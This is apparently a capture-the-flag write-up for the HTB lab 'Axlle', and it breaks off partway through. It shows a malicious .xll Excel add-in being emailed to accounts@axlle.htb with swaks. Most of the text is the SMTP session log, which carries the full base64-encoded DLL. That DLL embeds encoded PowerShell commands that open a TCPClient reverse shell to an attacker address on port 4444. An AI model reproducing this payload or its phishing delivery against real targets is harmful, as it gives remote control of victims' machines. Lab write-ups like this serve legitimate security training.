XLL
During the Web enumeration, it was identified that the about section specifies an account, accouts@axlle.htb, which can be contacted for invoices or requests in Excel format. It also indicates that macros are disabled in the Excel files provided.
Given the target SMTP service is up and running on the port 25, delivery can be made through there
It was speculated that code execution could potentially be achieved through the use of an Excel extension, specifically .xll.
The .xll extension refers to Excel Add-in files, which are dynamic link libraries (DLLs) designed to extend Excel’s functionality with additional features and custom functions. These files can include executable code, making them capable of enhancing Excel but also posing potential security risks if used maliciously. Due to their ability to run code, .xll files should be treated with caution, especially when obtained from untrusted sources.
Looking further into the .xll extension, there is a blog article showcasing an exploitation technique, using an XLL file for code execution
Exploit
The newly compiled XLL payload has been transferred to Kali
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ swaks --to accounts@axlle.htb --from blah@example.com --header "Subject: update" --body "check this out" --attach @HelloWorldXll.xll --server $IP
=== Trying 10.10.11.21:25...
=== Connected to 10.10.11.21.
<- 220 MAINFRAME ESMTP
-> EHLO kali
<- 250-MAINFRAME
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> MAIL FROM:<blah@example.com>
<- 250 OK
-> RCPT TO:<accounts@axlle.htb>
<- 250 OK
-> DATA
<- 354 OK, send.
-> Date: Thu, 27 Jun 2024 14:26:00 +0200
-> To: accounts@axlle.htb
-> From: blah@example.com
-> Subject: update
-> Message-Id: <20240627142600.1176320@kali>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
-> MIME-Version: 1.0
-> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_1176320"
->
-> ------=_MIME_BOUNDARY_000_1176320
-> Content-Type: text/plain
->
-> check this out
-> ------=_MIME_BOUNDARY_000_1176320
-> Content-Type: application/octet-stream; name="HelloWorldXll.xll"
-> Content-Description: HelloWorldXll.xll
-> Content-Disposition: attachment; filename="HelloWorldXll.xll"
-> Content-Transfer-Encoding: BASE64
->
-> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
-> ZGUuDQ0KJAAAAAAAAACfBN7o22Wwu9tlsLvbZbC70h0ju9llsLt2O7G62GWwu3Y7s7rZZbC7dju1
-> utJlsLt2O7S60mWwuwaae7vZZbC722Wxu/tlsLtsO7m62GWwu2w7sLraZbC7bDtPu9plsLtsO7K6
-> 2mWwu1JpY2jbZbC7AAAAAAAAAAAAAAAAAAAAAFBFAABkhgcA/ll9ZgAAAAAAAAAA8AAiIAsCDgAA
-> EAAAACYAAAAAAADAEwAAABAAAAAAAIABAAAAABAAAAACAAAGAAAAAAAAAAYAAAAAAAAAAJAAAAAE
-> AAAAAAAAAgBgAQAAEAAAAAAAABAAAAAAAAAAABAAAAAAAAAQAAAAAAAAAAAAABAAAABAMQAAUAAA
-> AJAxAABQAAAAAHAAAOABAAAAUAAAvAEAAAAAAAAAAAAAAIAAABgAAAAALAAAcAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAHAsAACUAAAAAAAAAAAAAAAAIAAA+AAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAC50ZXh0AAAAEw8AAAAQAAAAEAAAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAIAV
-> AAAAIAAAABYAAAAUAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAABIBgAAAEAAAAACAAAAKgAAAAAA
-> AAAAAAAAAAAAQAAAwC5wZGF0YQAAvAEAAABQAAAAAgAAACwAAAAAAAAAAAAAAAAAAEAAAEAuZ2Zp
-> ZHMAABAAAAAAYAAAAAIAAAAuAAAAAAAAAAAAAAAAAABAAABALnJzcmMAAADgAQAAAHAAAAACAAAA
-> MAAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAAGAAAAACAAAAAAgAAADIAAAAAAAAAAAAAAAAAAEAA
-> AEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgB
-> AAAAw8zMzMzMzMzMzMxIg+woSI0NpRYAAP8VxxAAAEiNDUgRAAD/FboQAAAzwEiDxCjDzMzMzMzM
-> zMzMzMzMzMzMzMxmZg8fhAAAAAAASDsNqS8AAPJ1EkjBwRBm98H///J1AvLDSMHJEOnDAwAAzMzM
-> SIPsKIXSdDmD6gF0KIPqAXQWg/oBdAq4AQAAAEiDxCjD6JIFAADrBehjBQAAD7bASIPEKMNJi9BI
-> g8Qo6Q8AAABNhcAPlcFIg8Qo6SwBAABIiVwkCEiJdCQQSIl8JCBBVkiD7CBIi/JMi/EzyegGBgAA
-> hMB1BzPA6egAAADohgQAAIrYiEQkQEC3AYM9ujQAAAB0CrkHAAAA6EIJAADHBaQ0AAABAAAA6MsE
-> AACEwHRn6HIKAABIjQ23CgAA6AoIAADoyQgAAEiNDdIIAADo+QcAAOjkCAAASI0VzQ8AAEiNDb4P
-> AADo2QwAAIXAdSnoUAQAAITAdCBIjRWdDwAASI0Njg8AAOizDAAAxwU3NAAAAgAAAEAy/4rL6A0H
-> AABAhP8PhU7////oqwgAAEiL2EiDOAB0JEiLyOhSBgAAhMB0GEiLG0iLy+hzCgAATIvGugIAAABJ
-> i87/0/8FbC4AALgBAAAASItcJDBIi3QkOEiLfCRISIPEIEFew8xIiVwkCEiJdCQYV0iD7CBAivGL
-> BTguAAAz24XAfwQzwOtQ/8iJBSYuAADoXQMAAECK+IhEJDiDPZMzAAACdAq5BwAAAOgbCAAA6GoE
-> AACJHXwzAADojwQAAECKz+hPBgAAM9JAis7oaQYAAITAD5XDi8NIi1wkMEiLdCRASIPEIF/DzMxI
-> i8RIiVggTIlAGIlQEEiJSAhWV0FWSIPsQEmL8Iv6TIvxhdJ1DzkVoC0AAH8HM8DpsgAAAI1C/4P4
-> AXcq6LYAAACL2IlEJDCFwA+EjQAAAEyLxovXSYvO6KP9//+L2IlEJDCFwHR2TIvGi9dJi87oGP3/
-> /4vYiUQkMIP/AXUrhcB1J0yLxjPSSYvO6Pz8//9Mi8Yz0kmLzuhj/f//TIvGM9JJi87oTgAAAIX/
-> dAWD/wN1KkyLxovXSYvO6ED9//+L2IlEJDCFwHQTTIvGi9dJi87oIQAAAIvYiUQkMOsGM9uJXCQw
-> i8NIi1wkeEiDxEBBXl9ew8zMzEiJXCQISIlsJBBIiXQkGFdIg+wgSIsdyQ0AAEmL+IvySIvpSIXb
-> dQWNQwHrEkiLy+iTCAAATIvHi9ZIi83/00iLXCQwSItsJDhIi3QkQEiDxCBfw0iJXCQISIl0JBBX
-> SIPsIEmL+IvaSIvxg/oBdQXodwUAAEyLx4vTSIvOSItcJDBIi3QkOEiDxCBf6Xf+///MzMxAU0iD
-> 7CBIi9kzyf8VTwwAAEiLy/8V9gsAAP8VOAwAAEiLyLoJBADASIPEIFtI/yUcDAAASIlMJAhIg+w4
-> uRcAAADoJwoAAIXAdAe5AgAAAM0pSI0NlywAAOiqAAAASItEJDhIiQV+LQAASI1EJDhIg8AISIkF
-> Di0AAEiLBWctAABIiQXYKwAASItEJEBIiQXcLAAAxwWyKwAACQQAwMcFrCsAAAEAAADHBbYrAAAB
-> AAAAuAgAAABIa8AASI0NrisAAEjHBAECAAAAuAgAAABIa8AASIsNJisAAEiJTAQguAgAAABIa8AB
-> SIsNGSsAAEiJTAQgSI0NXQwAAOgA////SIPEOMPMzMxAU1ZXSIPsQEiL2f8V7woAAEiLs/gAAAAz
-> /0UzwEiNVCRgSIvO/xXNCgAASIXAdDlIg2QkOABIjUwkaEiLVCRgTIvISIlMJDBMi8ZIjUwkcEiJ
-> TCQoM8lIiVwkIP8V/goAAP/Hg/8CfLFIg8RAX15bw8zMzEiD7CjofwgAAIXAdCFlSIsEJTAAAABI
-> i0gI6wVIO8h0FDPA8EgPsQ0gMAAAde4ywEiDxCjDsAHr98zMzEiD7CjoQwgAAIXAdAfocgYAAOsZ
-> 6C/6//+LyOhsCAAAhcB0BDLA6wfoZQgAALABSIPEKMNIg+woM8noQQEAAITAD5XASIPEKMPMzMxI
-> g+wo6GcIAACEwHUEMsDrEuhaCAAAhMB1B+hRCAAA6+ywAUiDxCjDSIPsKOg/CAAA6DoIAACwAUiD
-> xCjDzMzMSIlcJAhIiWwkEEiJdCQYV0iD7CBJi/lJi/CL2kiL6eicBwAAhcB1F4P7AXUSSIvP6LsF
-> AABMi8Yz0kiLzf/XSItUJFiLTCRQSItcJDBIi2wkOEiLdCRASIPEIF/pmQcAAMzMzEiD7CjoUwcA
-> AIXAdBBIjQ0ULwAASIPEKOmXBwAA6K4HAACFwHUF6JUHAABIg8Qow0iD7CgzyeiRBwAASIPEKOmI
-> BwAAQFNIg+wgD7YFBy8AAIXJuwEAAAAPRMOIBfcuAADoLgUAAOhhBwAAhMB1BDLA6xToVAcAAITA
-> dQkzyehJBwAA6+qKw0iDxCBbw8zMzEiJXCQIVUiL7EiD7ECL2YP5AQ+HpgAAAOivBgAAhcB0K4Xb
-> dSdIjQ1sLgAA6OcGAACFwHQEMsDrekiNDXAuAADo0wYAAIXAD5TA62dIixV1KAAASYPI/4vCuUAA
-> AACD4D8ryLABSdPITDPCTIlF4EyJRegPEEXgTIlF8PIPEE3wDxEFES4AAEyJReBMiUXoDxBF4EyJ
-> RfDyDxENCS4AAPIPEE3wDxEFBS4AAPIPEQ0NLgAASItcJFBIg8RAXcO5BQAAAOhUAgAAzMzMzEiD
-> 7BhMi8G4TVoAAGY5Benn//91eUhjBRzo//9IjRXZ5///SI0MEIE5UEUAAHVfuAsCAABmOUEYdVRM
-> K8IPt0EUSI1RGEgD0A+3QQZIjQyATI0MykiJFCRJO9F0GItKDEw7wXIKi0IIA8FMO8ByCEiDwijr
-> 3zPSSIXSdQQywOsUg3okAH0EMsDrCrAB6wYywOsCMsBIg8QYw8zMzEBTSIPsIIrZ6FcFAAAz0oXA
-> dAuE23UHSIcVCi0AAEiDxCBbw0BTSIPsIIA9Ly0AAACK2XQEhNJ1DorL6JQFAACKy+iNBQAAsAFI
-> g8QgW8PMQFNIg+wgSIsVAycAAEiL2YvKSDMVxywAAIPhP0jTykiD+v91CkiLy+hFBQAA6w9Ii9NI
-> jQ2nLAAA6CgFAAAzyYXASA9Ey0iLwUiDxCBbw8xIg+wo6Kf///9I99gbwPfY/8hIg8Qow8xIiVwk
-> IFVIi+xIg+wgSINlGABIuzKi3y2ZKwAASIsFhSYAAEg7w3VvSI1NGP8VngYAAEiLRRhIiUUQ/xWY
-> BgAAi8BIMUUQ/xWUBgAAi8BIjU0gSDFFEP8VjAYAAItFIEiNTRBIweAgSDNFIEgzRRBIM8FIuf//
-> /////wAASCPBSLkzot8tmSsAAEg7w0gPRMFIiQURJgAASItcJEhI99BIiQUKJgAASIPEIF3DSI0N
-> BSwAAEj/JQ4GAADMzEiNDfUrAADpBgQAAEiNBfkrAADDSI0F+SsAAMNIg+wo6Of///9IgwgE6Ob/
-> //9IgwgCSIPEKMPMSI0F7SsAAMNIiVwkCFVIjawkQPv//0iB7MAFAACL2bkXAAAA6PkDAACFwHQE
-> i8vNKYMlrCsAAABIjU3wM9JBuNAEAADolwMAAEiNTfD/FWkFAABIi53oAAAASI2V2AQAAEiLy0Uz
-> wP8VRwUAAEiFwHQ8SINkJDgASI2N4AQAAEiLldgEAABMi8hIiUwkMEyLw0iNjegEAABIiUwkKEiN
-> TfBIiUwkIDPJ/xVuBQAASIuFyAQAAEiNTCRQSImF6AAAADPSSI2FyAQAAEG4mAAAAEiDwAhIiYWI
-> AAAA6AADAABIi4XIBAAASIlEJGDHRCRQFQAAQMdEJFQBAAAA/xXKBAAAg/gBSI1EJFBIiUQkQEiN
-> RfAPlMNIiUQkSDPJ/xXxBAAASI1MJED/FZYEAACFwHUK9tsbwCEFqCoAAEiLnCTQBQAASIHEwAUA
-> AF3DzMzMSIlcJAhIiXQkEFdIg+wgSI0dJhQAAEiNNR8UAADrFkiLO0iF/3QKSIvP6GkAAAD/10iD
-> wwhIO95y5UiLXCQwSIt0JDhIg8QgX8PMzEiJXCQISIl0JBBXSIPsIEiNHeoTAABIjTXjEwAA6xZI
-> iztIhf90CkiLz+gdAAAA/9dIg8MISDvecuVIi1wkMEiLdCQ4SIPEIF/DzMxI/yW9BAAAzEiJXCQQ
-> SIl0JBhIiXwkIFVIi+xIg+wgg2XoADPJM8DHBbcjAAACAAAAD6JEi8nHBaQjAAABAAAAgfFjQU1E
-> RIvSgfJlbnRpi/uB90F1dGiL8Av6RIvDC/lBgfBHZW51M8lBgfJpbmVJRQvQuAEAAABEiwWBKQAA
-> QYHxbnRlbEUL0Q+iRIvZiUXwRIld+IvIiV30iVX8dVJIgw1FIwAA/0GDyAQl8D//D0SJBUkpAAA9
-> wAYBAHQoPWAGAgB0IT1wBgIAdBoFsPn8/4P4IHcbSLsBAAEAAQAAAEgPo8NzC0GDyAFEiQUPKQAA
-> hf91GYHhAA/wD4H5AA9gAHILQYPIBESJBfIoAAC4BwAAAIlV4ESJXeQ78HwkM8kPoolF8Ild9IlN
-> +IlV/Ild6A+64wlzC0GDyAJEiQW+KAAAQQ+64xRzbscFkSIAAAIAAADHBYsiAAAGAAAAQQ+64xtz
-> U0EPuuMcc0wzyQ8B0EjB4iBIC9BIiVUQSItFECQGPAZ1MosFXSIAAIPICMcFTCIAAAMAAAD2Regg
-> iQVGIgAAdBODyCDHBTMiAAAFAAAAiQUxIgAASItcJDgzwEiLdCRASIt8JEhIg8QgXcPMzDPAOQUk
-> IgAAD5XAw8IAAMzMzMzMzMzMzMzMzMz/JWICAAD/JVQCAAD/JUYCAAD/JagCAAD/JZoCAAD/JYwC
-> AAD/JX4CAAD/JXACAAD/JWICAAD/JVQCAAD/JUYCAAD/JTgCAAD/JSoCAAD/JdQBAACwAcPMM8DD
-> zMzMzMzMzMzMzMxmZg8fhAAAAAAA/+BAVUiD7CBIi+qKTUBIg8QgXen4+f//zEBVSIPsIEiL6ugh
-> +P//ik04SIPEIF3p3Pn//8xAVUiD7DBIi+pIiwGLEEiJTCQoiVQkIEyNDZHx//9Mi0Vwi1VoSItN
-> YOhR9///kEiDxDBdw8xAVUiL6kiLATPJgTgFAADAD5TBi8Fdw8wAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8NAAAAAAAACg0
-> AAAAAAAAajQAAAAAAABeNQAAAAAAAEg1AAAAAAAALjUAAAAAAAAYNQAAAAAAAAI1AAAAAAAA6DQA
-> AAAAAADMNAAAAAAAALg0AAAAAAAApDQAAAAAAACGNAAAAAAAAFY0AAAAAAAAAAAAAAAAAAAQMwAA
-> AAAAAPAyAAAAAAAA2DIAAAAAAAAAAAAAAAAAAPwzAAAAAAAA7jMAAAAAAADWMwAAAAAAALozAAAA
-> AAAAnjMAAAAAAAB8MwAAAAAAAGIzAAAAAAAAUDMAAAAAAABCMwAAAAAAADYzAAAAAAAALDMAAAAA
-> AAAAAAAAAAAAABAeAIABAAAAkB4AgAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBAAIABAAAA
-> 8EAAgAEAAAAAAAAAAAAAAHBvd2Vyc2hlbGwgLWUgSkFCakFHd0FhUUJsQUc0QWRBQWdBRDBBSUFC
-> T0FHVUFkd0F0QUU4QVlnQnFBR1VBWXdCMEFDQUFVd0I1QUhNQWRBQmxBRzBBTGdCT0FHVUFkQUF1
-> QUZNQWJ3QmpBR3NBWlFCMEFITUFMZ0JVQUVNQVVBQkRBR3dBYVFCbEFHNEFkQUFvQUNJQU1RQXdB
-> QzRBTVFBd0FDNEFNUUEwQUM0QU1RQXhBREFBSWdBc0FEUUFOQUEwQURRQUtRQTdBQ1FBY3dCMEFI
-> SUFaUUJoQUcwQUlBQTlBQ0FBSkFCakFHd0FhUUJsQUc0QWRBQXVBRWNBWlFCMEFGTUFkQUJ5QUdV
-> QVlRQnRBQ2dBS1FBN0FGc0FZZ0I1QUhRQVpRQmJBRjBBWFFBa0FHSUFlUUIwQUdVQWN3QWdBRDBB
-> SUFBd0FDNEFMZ0EyQURVQU5RQXpBRFVBZkFBbEFIc0FNQUI5QURzQWR3Qm9BR2tBYkFCbEFDZ0FL
-> QUFrQUdrQUlBQTlBQ0FBSkFCekFIUUFjZ0JsQUdFQWJRQXVBRklBWlFCaEFHUUFLQUFrQUdJQWVR
-> QjBBR1VBY3dBc0FDQUFNQUFzQUNBQUpBQmlBSGtBZEFCbEFITUFMZ0JNQUdVQWJnQm5BSFFBYUFB
-> cEFDa0FJQUF0QUc0QVpRQWdBREFBS1FCN0FEc0FKQUJrQUdFQWRBQmhBQ0FBUFFBZ0FDZ0FUZ0Js
-> QUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUMwQVZBQjVBSEFBWlFCT0FHRUFiUUJsQUNBQVV3QjVB
-> SE1BZEFCbEFHMEFMZ0JVQUdVQWVBQjBBQzRBUVFCVEFFTUFTUUJKQUVVQWJnQmpBRzhBWkFCcEFH
-> NEFad0FwQUM0QVJ3QmxBSFFBVXdCMEFISUFhUUJ1QUdjQUtBQWtBR0lBZVFCMEFHVUFjd0FzQURB
-> QUxBQWdBQ1FBYVFBcEFEc0FKQUJ6QUdVQWJnQmtBR0lBWVFCakFHc0FJQUE5QUNBQUtBQnBBR1VB
-> ZUFBZ0FDUUFaQUJoQUhRQVlRQWdBRElBUGdBbUFERUFJQUI4QUNBQVR3QjFBSFFBTFFCVEFIUUFj
-> Z0JwQUc0QVp3QWdBQ2tBT3dBa0FITUFaUUJ1QUdRQVlnQmhBR01BYXdBeUFDQUFQUUFnQUNRQWN3
-> QmxBRzRBWkFCaUFHRUFZd0JyQUNBQUt3QWdBQ0lBVUFCVEFDQUFJZ0FnQUNzQUlBQW9BSEFBZHdC
-> a0FDa0FMZ0JRQUdFQWRBQm9BQ0FBS3dBZ0FDSUFQZ0FnQUNJQU93QWtBSE1BWlFCdUFHUUFZZ0I1
-> QUhRQVpRQWdBRDBBSUFBb0FGc0FkQUJsQUhnQWRBQXVBR1VBYmdCakFHOEFaQUJwQUc0QVp3QmRB
-> RG9BT2dCQkFGTUFRd0JKQUVrQUtRQXVBRWNBWlFCMEFFSUFlUUIwQUdVQWN3QW9BQ1FBY3dCbEFH
-> NEFaQUJpQUdFQVl3QnJBRElBS1FBN0FDUUFjd0IwQUhJQVpRQmhBRzBBTGdCWEFISUFhUUIwQUdV
-> QUtBQWtBSE1BWlFCdUFHUUFZZ0I1QUhRQVpRQXNBREFBTEFBa0FITUFaUUJ1QUdRQVlnQjVBSFFB
-> WlFBdUFFd0FaUUJ1QUdjQWRBQm9BQ2tBT3dBa0FITUFkQUJ5QUdVQVlRQnRBQzRBUmdCc0FIVUFj
-> d0JvQUNnQUtRQjlBRHNBSkFCakFHd0FhUUJsQUc0QWRBQXVBRU1BYkFCdkFITUFaUUFvQUNrQQAA
-> AAAAAAAAAABwb3dlcnNoZWxsIC1lIEpBQmpBR3dBYVFCbEFHNEFkQUFnQUQwQUlBQk9BR1VBZHdB
-> dEFFOEFZZ0JxQUdVQVl3QjBBQ0FBVXdCNUFITUFkQUJsQUcwQUxnQk9BR1VBZEFBdUFGTUFid0Jq
-> QUdzQVpRQjBBSE1BTGdCVUFFTUFVQUJEQUd3QWFRQmxBRzRBZEFBb0FDSUFNUUF3QUM0QU1RQXVB
-> REVBTGdBeUFDSUFMQUEwQURRQU5BQTBBQ2tBT3dBa0FITUFkQUJ5QUdVQVlRQnRBQ0FBUFFBZ0FD
-> UUFZd0JzQUdrQVpRQnVBSFFBTGdCSEFHVUFkQUJUQUhRQWNnQmxBR0VBYlFBb0FDa0FPd0JiQUdJ
-> QWVRQjBBR1VBV3dCZEFGMEFKQUJpQUhrQWRBQmxBSE1BSUFBOUFDQUFNQUF1QUM0QU5nQTFBRFVB
-> TXdBMUFId0FKUUI3QURBQWZRQTdBSGNBYUFCcEFHd0FaUUFvQUNnQUpBQnBBQ0FBUFFBZ0FDUUFj
-> d0IwQUhJQVpRQmhBRzBBTGdCU0FHVUFZUUJrQUNnQUpBQmlBSGtBZEFCbEFITUFMQUFnQURBQUxB
-> QWdBQ1FBWWdCNUFIUUFaUUJ6QUM0QVRBQmxBRzRBWndCMEFHZ0FLUUFwQUNBQUxRQnVBR1VBSUFB
-> d0FDa0Fld0E3QUNRQVpBQmhBSFFBWVFBZ0FEMEFJQUFvQUU0QVpRQjNBQzBBVHdCaUFHb0FaUUJq
-> QUhRQUlBQXRBRlFBZVFCd0FHVUFUZ0JoQUcwQVpRQWdBRk1BZVFCekFIUUFaUUJ0QUM0QVZBQmxB
-> SGdBZEFBdUFFRUFVd0JEQUVrQVNRQkZBRzRBWXdCdkFHUUFhUUJ1QUdjQUtRQXVBRWNBWlFCMEFG
-> TUFkQUJ5QUdrQWJnQm5BQ2dBSkFCaUFIa0FkQUJsQUhNQUxBQXdBQ3dBSUFBa0FHa0FLUUE3QUNR
-> QWN3QmxBRzRBWkFCaUFHRUFZd0JyQUNBQVBRQWdBQ2dBYVFCbEFIZ0FJQUFrQUdRQVlRQjBBR0VB
-> SUFBeUFENEFKZ0F4QUNBQWZBQWdBRThBZFFCMEFDMEFVd0IwQUhJQWFRQnVBR2NBSUFBcEFEc0FK
-> QUJ6QUdVQWJnQmtBR0lBWVFCakFHc0FNZ0FnQUQwQUlBQWtBSE1BWlFCdUFHUUFZZ0JoQUdNQWF3
-> QWdBQ3NBSUFBaUFGQUFVd0FnQUNJQUlBQXJBQ0FBS0FCd0FIY0FaQUFwQUM0QVVBQmhBSFFBYUFB
-> Z0FDc0FJQUFpQUQ0QUlBQWlBRHNBSkFCekFHVUFiZ0JrQUdJQWVRQjBBR1VBSUFBOUFDQUFLQUJi
-> QUhRQVpRQjRBSFFBTGdCbEFHNEFZd0J2QUdRQWFRQnVBR2NBWFFBNkFEb0FRUUJUQUVNQVNRQkpB
-> Q2tBTGdCSEFHVUFkQUJDQUhrQWRBQmxBSE1BS0FBa0FITUFaUUJ1QUdRQVlnQmhBR01BYXdBeUFD
-> a0FPd0FrQUhNQWRBQnlBR1VBWVFCdEFDNEFWd0J5QUdrQWRBQmxBQ2dBSkFCekFHVUFiZ0JrQUdJ
-> QWVRQjBBR1VBTEFBd0FDd0FKQUJ6QUdVQWJnQmtBR0lBZVFCMEFHVUFMZ0JNQUdVQWJnQm5BSFFB
-> YUFBcEFEc0FKQUJ6QUhRQWNnQmxBR0VBYlFBdUFFWUFiQUIxQUhNQWFBQW9BQ2tBZlFBN0FDUUFZ
-> d0JzQUdrQVpRQnVBSFFBTGdCREFHd0Fid0J6QUdVQUtBQXBBQT09AAAAAAAA/ll9ZgAAAAACAAAA
-> YAAAAAQtAAAEIQAAAAAAAP5ZfWYAAAAADAAAABQAAABkLQAAZCEAAAAAAAD+WX1mAAAAAA0AAABU
-> AgAAeC0AAHghAAAAAAAA/ll9ZgAAAAAOAAAAAAAAAAAAAAAAAAAAlAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAABAAIABAAAAAAAAAAAAAAAAAAAAAAAAAPggAIABAAAAACEAgAEAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAEAAFJTRFNe7a/9FW5uTb3oVIZlEAztAQAAAEM6XFVzZXJzXGFkbWluXHNv
-> dXJjZVxyZXBvc1xIZWxsb1dvcmxkWGxsXHg2NFxSZWxlYXNlXEhlbGxvV29ybGRYbGwucGRiAAAA
-> AAAVAAAAFQAAAAMAAAASAAAAR0NUTAAQAACADgAALnRleHQkbW4AAAAAgB4AABIAAAAudGV4dCRt
-> biQwMACSHgAAgQAAAC50ZXh0JHgAACAAAPgAAAAuaWRhdGEkNQAAAAD4IAAAEAAAAC4wMGNmZwAA
-> CCEAAAgAAAAuQ1JUJFhDQQAAAAAQIQAACAAAAC5DUlQkWENaAAAAABghAAAIAAAALkNSVCRYSUEA
-> AAAAICEAAAgAAAAuQ1JUJFhJWgAAAAAoIQAACAAAAC5DUlQkWFBBAAAAADAhAAAIAAAALkNSVCRY
-> UFoAAAAAOCEAAAgAAAAuQ1JUJFhUQQAAAABAIQAAEAAAAC5DUlQkWFRaAAAAAFAhAAC0CwAALnJk
-> YXRhAAAELQAAzAIAAC5yZGF0YSR6enpkYmcAAADQLwAACAAAAC5ydGMkSUFBAAAAANgvAAAIAAAA
-> LnJ0YyRJWloAAAAA4C8AAAgAAAAucnRjJFRBQQAAAADoLwAACAAAAC5ydGMkVFpaAAAAAPAvAABQ
-> AQAALnhkYXRhAABAMQAAUAAAAC5lZGF0YQAAkDEAADwAAAAuaWRhdGEkMgAAAADMMQAAFAAAAC5p
-> ZGF0YSQzAAAAAOAxAAD4AAAALmlkYXRhJDQAAAAA2DIAAKgCAAAuaWRhdGEkNgAAAAAAQAAAQAAA
-> AC5kYXRhAAAAQEAAAAgGAAAuYnNzAAAAAABQAAC8AQAALnBkYXRhAAAAYAAAEAAAAC5nZmlkcyR5
-> AAAAAABwAABgAAAALnJzcmMkMDEAAAAAYHAAAIABAAAucnNyYyQwMgAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAEABEIAAAEAAAARFQgAFXQJABVkBwAVNAYAFTIR4CAe
-> AAABAAAA/xAAAIwRAACSHgAAAAAAAAEGAgAGMgJQEQ8GAA9kCAAPNAYADzILcCAeAAABAAAAJhIA
-> AEQSAACpHgAAAAAAAAEUCAAUZAgAFFQHABQ0BgAUMhBwCRoGABo0DwAachbgFHATYCAeAAABAAAA
-> qRIAAFMTAADFHgAAUxMAAAEGAgAGUgJQAQ8GAA9kBwAPNAYADzILcAEJAQAJYgAAAQgEAAhyBHAD
-> YAIwAQYCAAYyAjAJBAEABCIAACAeAAABAAAACxgAAJYYAAD7HgAAlhgAAAECAQACUAAAAQ0EAA00
-> CgANcgZQAQ0EAA00CQANMgZQARUFABU0ugAVAbgABlAAAAEXCAAXdAkAF2QIABc0BwAXMhBQAAAA
-> AAEAAAAAAAAAAAAAAAAAAAAAAAAA/ll9ZgAAAAByMQAAAQAAAAEAAAABAAAAaDEAAGwxAABwMQAA
-> EBAAAIQxAAAAAEhlbGxvV29ybGRYbGwueGxsAHhsQXV0b09wZW4AAFgyAAAAAAAAAAAAABozAAB4
-> IAAAeDIAAAAAAAAAAAAABjQAAJggAADgMQAAAAAAAAAAAAByNQAAACAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAPDQAAAAAAAAoNAAAAAAAAGo0AAAAAAAAXjUAAAAAAABINQAAAAAAAC41AAAAAAAAGDUA
-> AAAAAAACNQAAAAAAAOg0AAAAAAAAzDQAAAAAAAC4NAAAAAAAAKQ0AAAAAAAAhjQAAAAAAABWNAAA
-> AAAAAAAAAAAAAAAAEDMAAAAAAADwMgAAAAAAANgyAAAAAAAAAAAAAAAAAAD8MwAAAAAAAO4zAAAA
-> AAAA1jMAAAAAAAC6MwAAAAAAAJ4zAAAAAAAAfDMAAAAAAABiMwAAAAAAAFAzAAAAAAAAQjMAAAAA
-> AAA2MwAAAAAAACwzAAAAAAAAAAAAAAAAAAAIAF9fQ19zcGVjaWZpY19oYW5kbGVyAAAlAF9fc3Rk
-> X3R5cGVfaW5mb19kZXN0cm95X2xpc3QAAD4AbWVtc2V0AABWQ1JVTlRJTUUxNDAuZGxsAABmAHN5
-> c3RlbQAANgBfaW5pdHRlcm0ANwBfaW5pdHRlcm1fZQA/AF9zZWhfZmlsdGVyX2RsbAAYAF9jb25m
-> aWd1cmVfbmFycm93X2FyZ3YAADMAX2luaXRpYWxpemVfbmFycm93X2Vudmlyb25tZW50AAA0AF9p
-> bml0aWFsaXplX29uZXhpdF90YWJsZQAAPABfcmVnaXN0ZXJfb25leGl0X2Z1bmN0aW9uACIAX2V4
-> ZWN1dGVfb25leGl0X3RhYmxlAB4AX2NydF9hdGV4aXQAFgBfY2V4aXQAAGFwaS1tcy13aW4tY3J0
-> LXJ1bnRpbWUtbDEtMS0wLmRsbACuBFJ0bENhcHR1cmVDb250ZXh0ALUEUnRsTG9va3VwRnVuY3Rp
-> b25FbnRyeQAAvARSdGxWaXJ0dWFsVW53aW5kAACSBVVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAA
